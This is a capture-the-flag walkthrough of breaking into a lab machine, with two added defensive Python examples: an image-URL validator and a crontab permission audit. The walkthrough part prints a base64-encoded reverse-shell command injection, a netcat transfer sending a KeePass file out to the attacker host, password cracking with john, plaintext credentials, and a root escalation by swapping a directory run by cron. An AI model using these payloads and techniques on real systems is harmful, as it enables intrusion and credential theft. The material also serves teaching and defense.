After running Feroxbuster we find /cloud/:

feroxbuster -u http://10.10.254.116
...[snip]...
[####################] - 40s 30000/30000 742/s http://10.10.254.116/cloud/
...[snip]...

USER
We can inject into the url parameter that is used to post images:

POST /cloud/ HTTP/1.1
Host: 10.10.254.116
...[snip]...

url=`echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC44LjExOS4xMzcvNDQ0NCAwPiYx|base64+-d|bash`ncl;x.jpg

Now we have a shell on the box.
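The injected url value only works because the application hands it to a shell, so backticks and pipes get interpreted. As an added example, not part of the original writeup, here is how the receiving side could have refused that request: decode the form field, allow only a plain http(s) image URL with no shell syntax, and build the downloader command as an argv list so that no shell ever parses the value. The first form body is the one from the request above, used purely as a test vector; the benign URL, the curl argv and the image-extension list are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# The form body from the request above, used here only as a test vector for the filter.
FORM_BODY_FROM_WRITEUP = (
    "url=`echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC44LjExOS4xMzcvNDQ0NCAwPiYx"
    "|base64+-d|bash`ncl;x.jpg"
)
# Constructed benign request for comparison (the hostname is an assumption).
FORM_BODY_BENIGN = "url=https%3A%2F%2Fimg.example.com%2Fpics%2Fcat.jpg"

# Anything a POSIX shell treats specially, plus whitespace; none of it belongs in an image URL.
# (Query strings containing '&' are rejected too; an image fetch here does not need them.)
SHELL_METACHARS = re.compile(r"[`$|;&<>\\'\"(){}\s]")
# Plain path ending in an image extension; the extension list is an assumption.
ALLOWED_PATH = re.compile(r"/[A-Za-z0-9._~/-]*\.(?:jpe?g|png|gif)", re.IGNORECASE)


def parse_form_url(body: str) -> str:
    """Pull the url= field out of an application/x-www-form-urlencoded body."""
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        if key == "url":
            return unquote_plus(value)
    return ""


def validate_image_url(raw: str) -> tuple[bool, str]:
    """Allow-list check: absolute http(s) URL, a host, a plain image path, no shell syntax."""
    if not raw or len(raw) > 2048:
        return False, "empty or too long"
    if SHELL_METACHARS.search(raw):
        return False, "contains shell metacharacters or whitespace"
    try:
        parts = urlsplit(raw)
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme not in ("http", "https"):
        return False, "scheme must be http or https"
    if not parts.hostname or parts.username or parts.password:
        return False, "missing host or embedded credentials"
    if not ALLOWED_PATH.fullmatch(parts.path):
        return False, "path is not a plain image path"
    return True, "ok"


def fetch_argv(url: str) -> list[str]:
    """Build the downloader command as an argv list. Invoked execve-style (subprocess.run
    with a list, shell=False) there is no shell to interpret backticks or pipes, which is
    exactly what the injection above relied on. curl is an assumed downloader."""
    ok, reason = validate_image_url(url)
    if not ok:
        raise ValueError(reason)
    # '--' ends option parsing, so a value starting with '-' can never become a curl flag.
    return ["curl", "--fail", "--silent", "--max-time", "10", "--", url]


def triage(body: str) -> dict[str, object]:
    """Summarise one request body: decoded url, verdict and reason (useful for a log review)."""
    url = parse_form_url(body)
    ok, reason = validate_image_url(url)
    return {"url": url, "accepted": ok, "reason": reason}


if __name__ == "__main__":
    for body in (FORM_BODY_FROM_WRITEUP, FORM_BODY_BENIGN):
        print(triage(body))
```

The argv list removes the shell from the picture, but a fetcher that retrieves arbitrary user-supplied URLs can still be pointed at internal hosts; restricting the allowed hostnames, or resolving the host and refusing private address ranges, is a separate control the validator above does not provide.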
In /var/www/html/login.php we find some credentials:

...[snip]...
$logins = array('admin' => 'oncloud9','root' => 'oncloud9','administrator' => 'oncloud9');
...[snip]...

USER
In the /opt/ folder there is a KeePass database (dataset.kdbx); let's download it.

On our machine:
nc -l -p 1234 > dataset.kdbx

On the remote:
nc -w 3 10.8.119.137 1234 < dataset.kdbx

Cracking KeePass
We need to crack the password for the KeePass database:

keepass2john dataset.kdbx > dataset.hash
john --wordlist=/usr/share/wordlists/rockyou.txt dataset.hash
...[snip]...
741852963 (dataset)
...[snip]...

Opening the database with kpcli:
kpcli:/>open dataset.kdbx
kpcli:/>ls
=== Groups ===
Root/
kpcli:/>cd Root/
kpcli:/Root>ls
=== Entries ===
0. user:password
kpcli:/Root> show -a -f 0
Title: user:password
Uname: sysadmin
Pass: Cl0udP4ss40p4city#8700
...[snip]...

This password can be used to SSH in as user sysadmin.
ROOT

The scripts folder itself is not writable, but its parent directory belongs to the sysadmin group, so we can move it.
So create a new folder (scripts_/) with a scripts.php file containing a reverse shell.
Then move the original scripts/ folder to scripts_bak and move our scripts_/ folder into the old scripts location:

mv scripts scripts_bak && mv scripts_ scripts

After about a minute the scripts get executed and we get a shell as root.
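The root step works because a directory on the path to a script that a privileged scheduled task runs can be renamed by an unprivileged user: the script directory is safe, but its parent is not. As an added example (not from the original writeup), here is a small audit that walks every path component from / down to each script referenced in a crontab and reports the components a non-root user could write. The crontab lines, paths and ownership data are constructed to mirror the situation above; the real_lookup function is provided for running the same check on a live host.

```python
import os
import re
import stat
from collections.abc import Callable
from dataclasses import dataclass
from pathlib import PurePosixPath


@dataclass(frozen=True)
class Owner:
    uid: int
    gid: int
    mode: int  # permission bits only, e.g. 0o775


# Constructed ownership data mirroring the writeup: the scripts directory is root-owned and
# not writable, but it sits inside a home directory that its user (uid 1000) can write.
# /opt/scripts is the hardened alternative (every component root-owned, no group/world write).
CONSTRUCTED_TREE = {
    "/": Owner(0, 0, 0o755),
    "/home": Owner(0, 0, 0o755),
    "/home/sysadmin": Owner(1000, 1000, 0o755),
    "/home/sysadmin/scripts": Owner(0, 0, 0o755),
    "/home/sysadmin/scripts/script.php": Owner(0, 0, 0o644),
    "/opt": Owner(0, 0, 0o755),
    "/opt/scripts": Owner(0, 0, 0o755),
    "/opt/scripts/script.php": Owner(0, 0, 0o644),
    "/usr": Owner(0, 0, 0o755),
    "/usr/bin": Owner(0, 0, 0o755),
    "/usr/bin/php": Owner(0, 0, 0o755),
}

# Constructed system crontab: one job in the weak location, one in the hardened one.
CONSTRUCTED_CRONTAB = """\
# m h dom mon dow user command
* * * * * root /usr/bin/php /home/sysadmin/scripts/script.php
* * * * * root /usr/bin/php /opt/scripts/script.php
"""

# Absolute paths appearing as whole tokens in a cron command.
ABS_PATH = re.compile(r"(?<!\S)/[\w./-]+")


def constructed_lookup(path: str) -> Owner:
    """Ownership from the constructed tree (raises KeyError for unknown paths)."""
    return CONSTRUCTED_TREE[path]


def real_lookup(path: str) -> Owner:
    """Ownership from the live filesystem (follows symlinks)."""
    st = os.stat(path)
    return Owner(st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode))


def writable_by_non_root(info: Owner) -> bool:
    """True if a non-root principal can write: world-writable, group-writable by a non-root
    group, or owner-writable by a non-root owner. For a directory, write access means its
    entries can be renamed or replaced, which is exactly the rename trick used above."""
    if info.mode & stat.S_IWOTH:
        return True
    if info.mode & stat.S_IWGRP and info.gid != 0:
        return True
    return bool(info.mode & stat.S_IWUSR) and info.uid != 0


def weak_links(script: str, lookup: Callable[[str], Owner]) -> list[str]:
    """Every component from / down to the script that a non-root user could write, or that
    does not exist (a missing component is one somebody may be able to create)."""
    path = PurePosixPath(script)
    findings = []
    for component in list(reversed(path.parents)) + [path]:
        try:
            info = lookup(str(component))
        except (KeyError, FileNotFoundError):
            findings.append(f"{component} (missing)")
            continue
        if writable_by_non_root(info):
            findings.append(str(component))
    return findings


def audit_crontab(crontab: str, lookup: Callable[[str], Owner]) -> dict[str, list[str]]:
    """Map each absolute path referenced by a cron job to its weak components; only paths
    with findings are returned."""
    report = {}
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for script in ABS_PATH.findall(line):
            findings = weak_links(script, lookup)
            if findings:
                report[script] = findings
    return report


if __name__ == "__main__":
    for script, findings in audit_crontab(CONSTRUCTED_CRONTAB, constructed_lookup).items():
        print(f"{script}: writable by non-root at {', '.join(findings)}")
```

Run with real_lookup as root against /etc/crontab and the /etc/cron.d files to cover the whole chain, including the interpreter binary. Sticky-bit directories such as /tmp are still reported as world-writable even though other users cannot rename root-owned entries there; treat those as items to review rather than automatic findings.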